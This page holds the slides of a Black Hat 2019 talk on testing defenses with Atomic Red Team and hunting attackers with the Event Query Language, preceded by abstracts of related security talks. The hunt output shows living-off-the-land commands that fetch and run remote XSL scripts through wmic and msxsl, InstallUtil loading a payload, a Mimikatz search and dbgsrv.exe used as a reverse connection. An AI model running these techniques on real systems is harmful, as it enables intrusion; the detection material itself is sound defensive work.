Presented at Black Hat 2019
https://www.blackhat.com/us-19/briefings/schedule/index.html#fantastic-red-team-attacks-and-how-to-find-them-16540
Casey Smith (Red Canary)
Ross Wolf (Endgame)
bit.ly/fantastic19
Abstract:
Red team testing in organizations over the last year has shown a dramatic increase in detections mapped to MITRE ATT&CK™ across Windows, Linux and macOS. However, many organizations continue to miss several key techniques that, unsurprisingly, often blend in with day-to-day user operations. One example is Trusted Developer Utilities, which can be readily available on standard user endpoints, not just developer workstations, and which allow for code execution. XSL Script processing can also be used as an attack vector, as a number of trusted utilities can consume and execute scripts via XSL. Finally, trusted .NET default binaries are known to allow unauthorized execution as well; these include tools like InstallUtil, Regsvcs and AddInProcess. Specific techniques, coupled with procedural difficulties within a team, such as alert fatigue and a lack of understanding of environmental norms, make reliable detection of these events near impossible.
This talk summarizes prevalent and ongoing gaps across organizations uncovered by testing their defenses against a broad spectrum of attacks via Atomic Red Team. Many of these adversary behaviors are not atomic, but span multiple events in an event stream that may be arbitrarily and inconsistently separated in time by nuisance events.
Additionally, we introduce and demonstrate the open-sourced Event Query Language for creating high signal-to-noise analytics that close these prevalent behavioral gaps. EQL is event agnostic and can be used to craft analytics that readily link evidence across long sequences of log data. In a live demonstration, we showcase powerful but easy to craft analytics that catch adversarial behavior most commonly missed in organizations today.
The Hunter Games: How to Find the Adversary with Event Query Language - Ross Wolf
Circle City Con 2019 and BSides SATX 2019
Abstract:
How do you find malicious activity? We often resort to the cliché "you know it when you see it", but how do you even see it without drowning in data? MITRE’s ATT&CK knowledge base organizes adversary behavior into tactics and techniques, and orients our approach to endpoint data. It suggests questions that might be worth asking, but not a way to ask them. The Event Query Language (EQL) allows a security analyst to naturally express queries for IOC search, hunting, and behavioral detections, while remaining platform and data source agnostic.
In this talk, I will demonstrate the iterative process of establishing situational awareness in your environment, creating targeted detections, and hunting for the adversary in your environment with real data, queries, and results.
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch... - Chris Gates
Brucon 2016
The evolution chain in security testing is fundamentally broken due to a lack of understanding, reduction of scope, and a reliance on vulnerability “whack a mole.” To help break the barriers of the common security program we are going to have to divorce ourselves from the metrics of vulnerability statistics and Pavlovian risk color charts and really get to work on how our security programs perform during a REAL event. To do so, we must create an entirely new set of metrics, tests, procedures, implementations and repeatable processes. It is extremely rare that a vulnerability causes a direct risk to an environment; it is usually what the attacker DOES with the access gained that matters. In this talk we will discuss the way that internal and external teams have been created to simulate a REAL WORLD attack and work hand in hand with the defensive teams to measure the environment's resistance to the attacks. We will demonstrate attacks, capabilities, TTP tracking, trending, positive metrics, hunt integration and, most of all, we will lay out a road map to STOP this nonsense of Red vs BLUE and realize that we are all on the same team, sparring and training every day to be ready for the fight when it comes to us.
MITRE ATT&CK is quickly gaining traction and is becoming an important standard to use to assess the overall cyber security posture of an organization. Tools like ATT&CK Navigator facilitate corporate adoption and allow for a holistic overview on attack techniques and how the organization is preventing and detecting them. Furthermore, many vendors, technologies and open-source initiatives are aligning with ATT&CK. Join Erik Van Buggenhout in this presentation, where he will discuss how MITRE ATT&CK can be leveraged in the organization as part of your overall cyber security program, with a focus on adversary emulation.
Erik Van Buggenhout is the lead author of SANS SEC599 - Defeating Advanced Adversaries - Purple Team Tactics & Kill Chain Defenses. Next to his activities at SANS, Erik is also a co-founder of NVISO, a European cyber security firm with offices in Brussels, Frankfurt and Munich.
Threat hunting - Every day is hunting season - Ben Boyd
Breakout Presentation by Ben Boyd during the 2018 Nebraska Cybersecurity Conference.
Introduction to Threat Hunting and helpful steps for building a Threat Hunting Program of any size, from small to massive.
Effective Threat Hunting with Tactical Threat Intelligence - Dhruv Majumdar
How to set up a Threat Hunting Team for Active Defense utilizing Cyber Threat Intelligence and how CTI can help a company grow and improve its security posture.
My slides for PHDays 2018 Threat Hunting Hands-On Lab - https://www.phdays.com/en/program/reports/build-your-own-threat-hunting-based-on-open-source-tools/
Virtual Machines for lab are available here - https://yadi.sk/d/qB1PNBj_3ViWHe
Talk on Kaspersky lab's CoLaboratory: Industrial Cybersecurity Meetup #5 with @HeirhabarovT about several ATT&CK practical use cases.
Video (in Russian): https://www.youtube.com/watch?v=ulUF9Sw2T7s&t=3078
Many thanks to Teymur for the great tech dive
Sharpening your Threat-Hunting Program with ATTACK Framework - MITRE - ATT&CKcon
From MITRE ATT&CKcon Power Hour December 2020
By Hieu Tran, Threat Detection Team Lead FPT Cybersecurity Division
No matter how sophisticated and thorough your security precautions may be, you cannot assume your security measures are impenetrable. This is why you need a threat hunting program in place. But how can we implement a proper threat hunting program and run it efficiently? In this talk, we will uncover how to sharpen your threat hunting strategy by leveraging ATT&CK. Ultimately, we’ll demonstrate how effective employing the hunting methodology is on the real-world battlefield, fighting against well-known cyber espionage actors who strongly focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia.
MITRE ATT&CKcon 2018: Building an Atomic Testing Program, Brian Beyer, Red Ca... - MITRE - ATT&CKcon
Red Canary’s applied research team built the Atomic Red Team project based on a simple idea: encourage security teams to test their systems.
Leveraging MITRE ATT&CK, the series of small tests can be combined into chains to help teams gain insight into gaps in their security program at all levels. This talk describes how to use Atomic Red Team and how MITRE ATT&CK is leveraged to write the tests.
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz - Christopher Gerritz
BSides Las Vegas 2016 Talk: Powershell-fu: Hunting on the Endpoint. Presented the PSHunt framework (which will be released on Github) and methodology for hunting on the endpoint using Powershell across an enterprise or on an individual system.
Threat Hunting Procedures and Measurement Matrice - Vishal Kumar
This document provides the basics of Cyber Threat Hunting and answers some questions such as: What is Threat Hunting? Why is Threat Hunting important? How can it be started? ...Bla..Bla..Bla...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ... - MITRE ATT&CK
From ATT&CKcon 3.0
By Jonny Johnson, Red Canary and Olaf Hartong, FalconForce
As defenders, we often find ourselves wanting "more" data. But why? Will this new data provide a lot of value or is it for a very niche circumstance? How many attacks does it apply to? Are we leveraging previous data sources to their full capability? Within this talk, Olaf and Jonny will walk through different data sources they leverage more than most when analyzing data within environments, why they do, and what these data sources do and can provide in terms of value to a defender.
Web application security and Python security best practices - PGS Software S.A.
Michał Wodyński, a Python developer at PGS Software, talked about security best practices at the wroc.py meetup in January 2019 in Wrocław.
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh... - CODE BLUE
In many targeted attack cases, once the attacker gains entry into the network, malware infection will spread laterally. In incident responses, investigating this lateral movement activity is very important. Methods for investigating lateral movement include log analysis of infected hosts and forensic analysis of disk images. However, in many cases, useful logs for incident investigation are not recorded in infected hosts, making it difficult to trace the attackers' behavior. This often results in not being able to get a clear picture of how the infection spreads across the network.
Therefore, we investigated attackers' C2 servers and malware to gain insight into their activities. By decoding the malware's communication logs and C2 server logs, we were able to understand the attackers’ activity after the network intrusion. We also found common patterns in how infections spread laterally. Even across different campaigns with different malware deployed, many common tools were used by the attackers.
Taking advantage of this similarity, we figured that tracking these tools is effective in understanding lateral movement. In Windows PCs, which are the main target of APT attacks, certain
Unmasking Careto through Memory Forensics (video in description) - Andrew Case
My presentation from SecTor 2014 on analyzing the sophisticated Careto malware with memory forensics & Volatility
Video here: http://2014.video.sector.ca/video/110388398
Automate threat detections and avoid false positives - Elasticsearch
Detect threats and avoid the noise of false positives with the detection engine in Elastic Security. Automate threat detection via correlations and machine learning through real-world examples.
Automate threat detection and avoid false positives - Elasticsearch
By eliminating blind spots, you now have enough context. But does that mean you can extract important information when you need it? Learn how to detect threats while avoiding false positives with the detection engine in Elastic Security. You will learn how to automate threat detection using correlations and machine learning, with real-world examples.
PyCon AU 2012 - Debugging Live Python Web Applications - Graham Dumpleton
Monitoring tools record the result of what happened to your web application when a problem arises, but for some classes of problems, monitoring systems are only a starting point. Sometimes it is necessary to take more intrusive steps to plan for the unexpected by embedding mechanisms that will allow you to interact with a live deployed web application and extract even more detailed information.
Automate threat detections and avoid false positives - Elasticsearch
Eliminating blind spots means you now have enough context. But can you get important insights from that context when you need it? Learn how to detect threats — while avoiding the noise of false positives — with the detection engine in Elastic Security. You’ll see how to automate threat detection via correlations and machine learning, with real-world examples of each.
The Supporting Role of Antivirus Evasion while Persisting - CTruncer
This talk goes over different techniques to evade detection by antivirus programs, talks about how Veil-Evasion evades the programs, and shows an AV signature bypass. It also then documents a large number of techniques on how actors can persist in networks.
Automate threat detections and avoid false positives - Imma Valls Bernaus
Eliminating blind spots means you have enough context. But can you get important insights from that context when you need them? Learn to detect threats while avoiding the noise of false positives, with the detection engine in Elastic Security. You will see how to automate threat detection through correlations and machine learning, with real-world examples of each.
In this PowerPoint, learn how a security policy can be your first line of defense. Servers running AIX and other operating systems are frequent targets of cyberattacks, according to the Data Breach Investigations Report. From DoS attacks to malware, attackers have a variety of strategies at their disposal. Having a security policy in place makes it easier to ensure you have appropriate controls in place to protect mission-critical data.
Automate threat detection and avoid false positives - Elasticsearch
Detect threats and avoid false positives with the detection engine in Elastic Security. Automate threat detection through correlations and machine learning, with real-world examples.
Today, criminals are using novel techniques to bypass AV detections. Manual debugging must be used to unpack malware (hard work that is needed to reveal the original malware code). Dissecting malware allows us to understand criminals’ modus operandi, and manual analysis is always required to reveal FUD malware.
Automate threat detections and avoid false positives - Elasticsearch
Eliminating blind spots means you have enough context. But can you get important insights from that context when you need them? Learn to detect threats, while avoiding the noise of false positives, with the detection engine in Elastic Security. You will see how to automate threat detection through correlations and machine learning, with real-world examples of each.
3. qwinsta /server:bh-19
Casey Smith
Director of Applied Research @ Red Canary
Project Developer Atomic Red Team
I love testing defenses
Mostly Gryffindor
Ross Wolf
Senior Threat Researcher @ Endgame
Created the Event Query Language
Detector of attacker tradecraft
Likely a Ravenclaw
@rw_access @subTee
4. Agenda
● How to test with Atomic Red Team
○ Frequently missed attacks
○ How do we test security tools?
● How to hunt with Event Query Language (EQL)
○ Introduction to behavioral detection
○ Crash course with examples
● Red vs Blue
○ Exercise using EQL to find unknown threats
○ Investigate a sample data set
○ Uncover a new attacker technique
● Conclusions
bit.ly/fantastic19
6. Many defenders do not know
HOW to start testing, or they are
not testing well.
This was the reason we created
Atomic Red Team.
7. What is Atomic Red Team?
● Open source project for testing for security controls
● YAML described tests mapped to MITRE ATT&CK™
● Simple easy tests—many can be run in a single command line
● Demystify attacks by providing code and examples
● DOES NOT replace human red team, adversary emulation, adaptation.
atomicredteam.io
8. Example Atomic Technique YAML
attack_technique: T1118
display_name: InstallUtil
atomic_tests:
- name: InstallUtil GetHelp method call
  supported_platforms:
  - windows
  input_arguments:
    filename:
      description: location of the payload
      type: Path
      default: C:\AtomicRedTeam\atomics\T1118\src\T1118.dll
  executor:
    name: command_prompt
    # #{filename} is replaced with the input argument's value when the test runs
    command: |
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /? #{filename}
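The YAML above declares an input argument and references it from the executor command. The following is an added example, not code from the slides or from the Atomic Red Team project, showing how a runner turns that description into a concrete command: the parsed test is embedded as a Python dict (assumed to be what a YAML loader would produce, so the example runs offline), defaults are applied unless overridden, and undeclared placeholders or overrides are rejected rather than silently passed to a shell. Function names are hypothetical.

```python
import re

# Constructed: the slide's T1118 atomic test as a YAML loader would parse it.
T1118_TEST = {
    "attack_technique": "T1118",
    "display_name": "InstallUtil",
    "atomic_tests": [
        {
            "name": "InstallUtil GetHelp method call",
            "supported_platforms": ["windows"],
            "input_arguments": {
                "filename": {
                    "description": "location of the payload",
                    "type": "Path",
                    "default": r"C:\AtomicRedTeam\atomics\T1118\src\T1118.dll",
                }
            },
            "executor": {
                "name": "command_prompt",
                # the YAML '|' block keeps its trailing newline
                "command": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /? #{filename}" + "\n",
            },
        }
    ],
}

PLACEHOLDER = re.compile(r"#\{(\w+)\}")   # matches #{name}


def render_command(test, overrides=None):
    """Fill #{name} placeholders in the executor command from input_arguments.

    Values come from `overrides` when given, otherwise from each argument's
    default. Overrides for undeclared arguments and placeholders with no
    declared argument raise KeyError instead of reaching the executor.
    """
    overrides = overrides or {}
    args = test.get("input_arguments", {})
    unknown = set(overrides) - set(args)
    if unknown:
        raise KeyError(f"override for undeclared argument(s): {sorted(unknown)}")
    values = {name: overrides.get(name, spec["default"]) for name, spec in args.items()}

    def substitute(match):
        name = match.group(1)
        if name not in values:
            raise KeyError(f"command references undeclared argument #{{{name}}}")
        return str(values[name])

    return PLACEHOLDER.sub(substitute, test["executor"]["command"]).strip()


def platform_supported(test, platform):
    """True when the test declares the given platform (e.g. 'windows')."""
    return platform in test["supported_platforms"]


if __name__ == "__main__":
    test = T1118_TEST["atomic_tests"][0]
    if platform_supported(test, "windows"):
        print(render_command(test))
        print(render_command(test, {"filename": r"D:\lab\T1118.dll"}))
```

The rendered string is what a framework would hand to the declared executor (command_prompt here); keeping argument resolution separate from execution is what lets the same test be reviewed, logged and customized before anything runs.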
9. Easy to Automate, Chain Tests Together.
Tests are benign and can be fully customized as needed.
10. Observations with Atomic Red Team
● Validate telemetry collection & detection logic
● Understanding your data and visibility
● Knowledge of the environment
● Detections for common techniques
11. Frequently Missed MITRE ATT&CK Techniques
● T1036 Masquerading
● T1047 Windows Management Instrumentation
● T1055 Process Injection
● T1118 InstallUtil
● T1127 Trusted Developer Tools
● T1170 MSHTA
● T1220 XSL Script Processing
Often leverage built-in native OS tools
12. Prepare For Actual Incidents
InstallUtil (MITRE ATT&CK T1118)
https://securelist.com/using-legitimate-tools-to-hide-malicious-code/83074/
MSBuild (MITRE ATT&CK T1127)
https://unit42.paloaltonetworks.com/unit42-paranoid-plugx/
13. Atomic Red Team May Help
Organizations Prepare
By introducing small, benign examples to test and practice
response/coverage/hunting.
15. Behaviors occur over time
and we need to monitor
where the action happens.
We can get answers to
behavioral questions with the
Event Query Language.
16. Event Query Language
● Simple syntax designed for hunting and detection
● Supports contextual and complex behaviors
● Tracks lineage and event sequences statefully
● Filter, stack and sift through data with pipes
● Dynamic shell for querying data
eql.readthedocs.io
17. Event Queries
● <event type> where <condition>
● and or not < <= == != >= >
● Wildcard with asterisk *
● Case-insensitive comparisons
process where
process_name == "svchost.exe" and
not (command_line == "* -k *" or
parent_process_name == "services.exe")
18. Sequences
● Match multiple events in order
● Shared properties with by syntax
● Timeouts with maxspan=5m
● Statefully expire sequences with until condition
sequence with maxspan=<time>
[ <event_type> where <condition>] by <A>, <B>, <C>
[ <event_type> where <condition>] by <D>, <E>, <F>
19. Sequences
● Match multiple events in order
● Shared properties with by syntax
● Timeouts with maxspan=5m
● Statefully expire sequences with until condition
sequence with maxspan=5m
[ file where file_name == "*.exe"
and user_name != "SYSTEM"] by file_path
[ process where user_name == "SYSTEM"] by process_path
20. Join
● Multiple events without ordering
● No time limitations
● Allows by and until syntax
join
[<event_type> where <condition>]
[<event_type> where <condition>]
21. Join
● Multiple events without ordering
● No time limitations
● Allows by and until syntax
join
[file where file_path == "*\\System32\\Tasks\\h4x0r.xml"]
[registry where registry_path == "*\\runonce\\h4xor"]
22. Join
● Multiple events without ordering
● No time limitations
● Allows by and until syntax
join by source_ip, destination_ip
[network where destination_port == 3389] // RDP
[network where destination_port == 135] // RPC
[network where destination_port == 445] // SMB
23. Data Pipes
● Perform data stacking while hunting
● Process results by filtering, counting and removing duplicates
count filter head
sort tail unique
unique_count
process where user_name != "SYSTEM"
| unique process_name, user_name
| unique_count process_name
| filter count == 1
24. Process Lineage
● Natively tracks lineage by monitoring process create and terminate
● Supports descendant of, child of, and event of relationships
● Combine or nest with other logic
network where process_name == "powershell.exe"
and descendant of
[process where
process_name in ("outlook.exe",
"winword.exe",
"powerpnt.exe",
"excel.exe")]
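As an added example (not code from the talk or the EQL project), a small Python lineage tracker in the spirit of the descendant of relationship described above: it builds ancestry from process create and terminate events and answers the slide's question over constructed events. Snapshotting the ancestor chain at create time and dropping a pid on terminate is this example's own design choice, not a statement about how EQL implements lineage.

```python
# Added example: a lineage tracker in the spirit of EQL's `descendant of`.
OFFICE = {"outlook.exe", "winword.exe", "powerpnt.exe", "excel.exe"}
def proc(subtype, pid, name, ppid=None):   # constructed process event
    return {"event_type": "process", "subtype": subtype, "unique_pid": pid,
            "unique_ppid": ppid, "process_name": name}
def net(pid, name, dest):                   # constructed network event
    return {"event_type": "network", "subtype": "outgoing", "unique_pid": pid,
            "process_name": name, "destination": dest}

# Constructed events in arrival order, not real telemetry; pid 1 is explorer.exe.
EVENTS = [
    proc("create", 100, "outlook.exe", 1),
    proc("create", 200, "cmd.exe", 100),
    proc("create", 300, "powershell.exe", 200),  # outlook -> cmd -> powershell
    proc("create", 400, "powershell.exe", 1),    # interactive console, explorer child
    net(400, "powershell.exe", "10.10.10.10"),
    proc("terminate", 100, "outlook.exe"),
    net(300, "powershell.exe", "10.10.10.10"),   # still a descendant of outlook
    proc("create", 100, "notepad.exe", 1),       # pid 100 reused after terminate
    proc("create", 500, "powershell.exe", 100),
    net(500, "powershell.exe", "10.10.10.10"),   # parent is notepad, not Office
]

class Lineage:
    """Ancestry per unique_pid, snapshotted at create; terminate drops the pid."""
    def __init__(self):
        self.names, self.ancestors = {}, {}
    def observe(self, ev):
        if ev["event_type"] != "process":
            return
        pid = ev["unique_pid"]
        if ev["subtype"] == "create":
            ppid = ev["unique_ppid"]
            self.names[pid] = ev["process_name"]
            self.ancestors[pid] = [(ppid, self.names.get(ppid))] + self.ancestors.get(ppid, [])
        elif ev["subtype"] == "terminate":
            self.names.pop(pid, None)
            self.ancestors.pop(pid, None)
    def descendant_of(self, pid, names):   # does any ancestor carry one of `names`?
        return any(n in names for _, n in self.ancestors.get(pid, []))

def office_spawned_powershell_network(events=EVENTS):
    # network where process_name == "powershell.exe" and descendant of [Office apps]
    lin, hits = Lineage(), []
    for ev in events:
        lin.observe(ev)
        if (ev["event_type"] == "network" and ev["process_name"] == "powershell.exe"
                and lin.descendant_of(ev["unique_pid"], OFFICE)):
            hits.append(ev)
    return hits
```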
27. Setting the Stage
● Windows endpoint with Sysmon installed
● Real background noise
● Data exported to json.gz file
Goals
Blue Team Objective:
Find the red team and scope the compromise
Red Team Objective:
Target a developer system with a unique attack
28. Investigative Process
● Gather an initial set of suspicious activity
○ Alerting from existing detectors
○ Hunting for evidence of compromise
● Reduce the data set until it’s manageable
● Triage results to determine good or bad
● Scope the compromise by pulling on threads
30. Guiding Questions
● What persistence locations are new?
● Are there unusual process relationships?
● Were there attempts to blend in?
● Did anything start behaving differently?
○ First seen network connection for a process
○ First lateral movement attempt for a user
Think situational awareness + ATT&CK tactics
31. mutatio corporis
Were any native tools renamed and executed?
process where subtype.create and original_file_name != process_name
  and original_file_name in (
    "cmd.exe", "certutil.exe",
    "cscript.exe", "dsquery.exe",
    "installutil.exe", "powershell.exe",
    "rundll32.exe", "wscript.exe"
  )
| unique original_file_name, file_name
0 results found
32. lolbas revello
What callbacks were established from binaries used to live off the land?
sequence by unique_pid
[process where subtype.create and process_name in (
"Atbroker.exe", "Bash.exe", "Bitsadmin.exe", "Certutil.exe",
"Cmdkey.exe", "Cmstp.exe", "Control.exe", "Csc.exe",
"Cscript.exe", "Dfsvc.exe", "Diskshadow.exe", "Dnscmd.exe",
"Esentutl.exe", "Extexport.exe", "Extrac32.exe", "Expand.exe",
// 61 binaries from https://github.com/api0cradle/LOLBAS/blob/master/LOLBins.md
)]
[network where subtype.outgoing]
| unique events[0].command_line
8 results found
34. Please, you don’t understand... Nothing in there is dangerous.
Triage Results
35. Guiding Questions
● Is the path unexpected?
● Do file names look like Windows binaries?
● Was the PE image signed?
● Is it a legitimate product?
● Has this been publicly reported?
42. explicate parvuli
What descendants were spawned from the interactive PowerShell console?
process where subtype.create and descendant of [
network where event of [
process where subtype.create and
parent_process_name == "explorer.exe" and
process_name == "powershell.exe"
]
]
43 results found
46. explicate parvuli
What descendants were spawned from the interactive PowerShell console?
process_name  command_line
cmd.exe       "C:\Windows\system32\cmd.exe" /c
cmd.exe       "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list"
WMIC.exe      wmic.exe process /FORMAT:list
cmd.exe       "C:\Windows\system32\cmd.exe" /c
cmd.exe       "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"
WMIC.exe      wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl
cmd.exe       "C:\Windows\system32\cmd.exe" /c
cmd.exe       "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl"
Showing results 21-28 of 43
47. explicate parvuli
What descendants were spawned from the interactive PowerShell console?
process_name  command_line
msxsl.exe     C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl
calc.exe      "C:\Windows\System32\calc.exe"
cmd.exe       "C:\Windows\system32\cmd.exe" /c
cmd.exe       "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl"
msxsl.exe     C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl
calc.exe      "C:\Windows\System32\calc.exe"
cmd.exe       "C:\Windows\system32\cmd.exe" /c
Showing results 29-35 of 43
48. explicate parvuli
What descendants were spawned from the interactive PowerShell console?
process_name  command_line
cmd.exe       "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:list"
WMIC.exe      wmic.exe process /FORMAT:list
cmd.exe       "C:\Windows\system32\cmd.exe" /c
cmd.exe       "C:\Windows\system32\cmd.exe" /c "wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"
WMIC.exe      wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl
cmd.exe       "C:\Windows\system32\cmd.exe" /c
WMIC.exe      "C:\Windows\System32\Wbem\WMIC.exe" os get /format:wmicscript
WMIC.exe      "C:\Windows\System32\Wbem\WMIC.exe" os get /format:wmicscript.xsl
Showing results 36-43 of 43
50. claves revelare
What loaded the PowerShell module Invoke-Mimikatz?
sequence
[process where subtype.create] by unique_pid
[process where subtype.create and
command_line == "*Invoke-Mimikatz*"] by unique_ppid
1 result found
53. lolbas revello
event_type  parent_process_name  process_name     command_line  destination
process     explorer.exe         InstallUtil.exe  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" /? C:\Users\NEWTSC~1\AppData\Local\Temp\a3541d3f-a4db-c8b0-dab7-c268095df70e.chm
network                          InstallUtil.exe  10.10.10.10
✘ Red Team
54. distincta imperium
What unique PowerShell commands were seen?
process where subtype.create
and process_name == "powershell.exe"
and command_line == "* *"
| unique_count command_line
3 unique results found
57. integritas campester
What files were created by non-SYSTEM users but later executed as SYSTEM?
sequence
  [file where subtype.create
    and event of [process where subtype.create and user_name != "SYSTEM"]] by file_path
  [process where subtype.create and user_name == "SYSTEM"] by process_path
0 results found
58. novum nexumus
What processes recently made their first network connection?
network where subtype.outgoing
| unique process_path
| tail 15
15 results found
63. novum nexumus
destination   port  process_path                                                   user_name
10.10.10.10   8443  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  NewtScamander
10.10.10.129  22    C:\Program Files\Debugging Tools for Windows (x64)\dbgsrv.exe  NewtScamander
10.10.10.10   8443  C:\Windows\System32\notepad.exe                                NewtScamander
64. novum nexumus
destination   port  process_path                                                   user_name
10.10.10.10   8443  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  NewtScamander
10.10.10.129  22    C:\Program Files\Debugging Tools for Windows (x64)\dbgsrv.exe  NewtScamander
10.10.10.10   8443  C:\Windows\System32\notepad.exe                                NewtScamander
✘ Red Team
67. nota vocatio
Why is notepad.exe making outbound network connections?
sequence by unique_pid
  [process where process_name == "notepad.exe"]
  [network where subtype.outgoing]
process_name  event_type  subtype   parent_process_path                                            destination
notepad.exe   process     create    C:\Program Files\Debugging Tools for Windows (x64)\dbgsrv.exe
notepad.exe   network     outgoing                                                                 10.10.10.10
notepad.exe   process     create    C:\Program Files\Debugging Tools for Windows (x64)\dbgsrv.exe
notepad.exe   network     outgoing                                                                 10.10.10.10
68. nota vocatio
What else did dbgsrv.exe do?
any where event_type in ("process", "network",
"file", "registry")
and process_name == "dbgsrv.exe"
| unique unique_pid, event_type, subtype
7 results found
69. nota vocatio
What else did dbgsrv.exe do?
pid   event_type  subtype    parent_process_name  command_line  destination
7268  process     create     explorer.exe         "C:\Program Files\Debugging Tools for Windows (x64)\dbgsrv.exe" -t tcp:clicon=10.10.10.129,port=22
7268  network     outgoing                                                                                          10.10.10.129
7268  process     terminate
4956  process     create     explorer.exe         "C:\Program Files\Debugging Tools for Windows (x64)\dbgsrv.exe" -t tcp:clicon=remotedebug.msdn.azure.com,port=22
8044  process     create     explorer.exe         "C:\Program Files\Debugging Tools for Windows (x64)\dbgsrv.exe" -t tcp:clicon=remotedebug.msdn.azure.com,port=22
2680  process     create     explorer.exe         "C:\Program Files\Debugging Tools for Windows (x64)\dbgsrv.exe" -t tcp:clicon=remotedebug.msdn.azure.com,port=22
2680  network     outgoing                                                                                          10.10.10.129
70. novum nexumus
destination   port  process_path                                                   user_name
10.10.10.129  22    C:\Program Files\Debugging Tools for Windows (x64)\dbgsrv.exe  NewtScamander
10.10.10.10   8443  C:\Windows\System32\notepad.exe                                NewtScamander
✘ New technique?
72. DBGSRV: A Fantastic Red-Team Attack
Think of this tool as giving you what is functionally equivalent to
● Reverse TCP Connection
● Process Hollowing
● Whitelist Evasion
Disclosed to MSRC, cleared for disclosure.
- It is a binary working as designed. It is not an exploit.
76. DBGSRV: Detection
ATT&CK T1127: Trusted Developer Utilities
sequence
[process where subtype.create and
(process_name == "dbgsrv.exe" or
original_file_name == "dbgsrv.exe")
] by unique_pid
[network where subtype.outgoing] by unique_pid
[process where subtype.create] by unique_ppid
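As an added example (not the talk's or the EQL project's code), a Python sketch of the stateful sequence ... by ... with maxspan matching from the Sequences slides, applied to the dbgsrv.exe detection above: process create, then an outgoing network event joined on unique_pid, then a child process joined on unique_ppid. Field names follow the slides' schema; the events and their `t` timestamps (seconds) are constructed for the example.

```python
# Added example: a minimal stateful matcher in the spirit of EQL `sequence ... by`.
from collections import defaultdict
# Constructed Sysmon-style events (not real telemetry); `t` is seconds. The first
# three form the dbgsrv chain; the last is noise (notepad started by explorer).
EVENTS = [
    {"t": 0, "event_type": "process", "subtype": "create", "process_name": "dbgsrv.exe",
     "original_file_name": "dbgsrv.exe", "unique_pid": 7268, "unique_ppid": 1100},
    {"t": 2, "event_type": "network", "subtype": "outgoing", "process_name": "dbgsrv.exe",
     "unique_pid": 7268, "destination": "10.10.10.129"},
    {"t": 5, "event_type": "process", "subtype": "create", "process_name": "notepad.exe",
     "original_file_name": "notepad.exe", "unique_pid": 8100, "unique_ppid": 7268},
    {"t": 6, "event_type": "process", "subtype": "create", "process_name": "notepad.exe",
     "original_file_name": "notepad.exe", "unique_pid": 8200, "unique_ppid": 1100},
]

def run_sequence(events, stages, maxspan=None):
    """stages: one (predicate, join_field) per bracketed subquery. A chain waiting at
    stage i advances when a later event passes stage i with the chain's join key;
    chains older than maxspan seconds expire. Returns the completed chains."""
    pending = defaultdict(list)        # (next_stage, key) -> partial chains
    matches = []
    for ev in sorted(events, key=lambda e: e["t"]):
        for idx, (pred, field) in enumerate(stages):
            if field not in ev or not pred(ev):
                continue
            key = ev[field]
            if idx == 0:                   # open a new chain keyed on this event
                pending[(1, key)].append([ev])
                continue
            for chain in pending.pop((idx, key), []):
                if maxspan is not None and ev["t"] - chain[0]["t"] > maxspan:
                    continue               # stateful expiry, like maxspan
                chain = chain + [ev]
                if idx + 1 == len(stages):
                    matches.append(chain)
                else:
                    pending[(idx + 1, key)].append(chain)
    return matches

def is_dbgsrv_create(e):
    return (e["event_type"] == "process" and e["subtype"] == "create" and
            "dbgsrv.exe" in (e.get("process_name"), e.get("original_file_name")))

DBGSRV_STAGES = [                      # the slide's three subqueries and `by` fields
    (is_dbgsrv_create, "unique_pid"),
    (lambda e: e["event_type"] == "network" and e["subtype"] == "outgoing", "unique_pid"),
    (lambda e: e["event_type"] == "process" and e["subtype"] == "create", "unique_ppid"),
]
def detect_dbgsrv(events=EVENTS, maxspan=None):
    return run_sequence(events, DBGSRV_STAGES, maxspan)   # [create, network, child]
```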
78. EQL Analytics Library
● Library of 100+ detections written in EQL
● Mapped to ATT&CK tactics and techniques
○ Automatically updated coverage
● Abstracted from specific data sources
○ Provide a mapping to your fields
○ Sysmon already implemented
eqllib.readthedocs.io
79. EQL Analytics Library
[analytic.metadata]
categories = ["detect"]
confidence = "medium"
contributors = ["Endgame"]
created_date = "08/08/2019"
description = "Detect dbgsrv.exe used to launch remote debuggers as a potential remote access tool"
id = "70814733-e756-4eda-8840-5e16c49304f6"
name = "DbgSrv Remote Debugger"
os = ["windows"]
tactics = ["Execution"]
techniques = ["T1127"]
updated_date = "08/08/2019"
[analytic]
query = '''
sequence
  [process where subtype.create and
    (process_name == "dbgsrv.exe" or original_file_name == "dbgsrv.exe")]
    by unique_pid
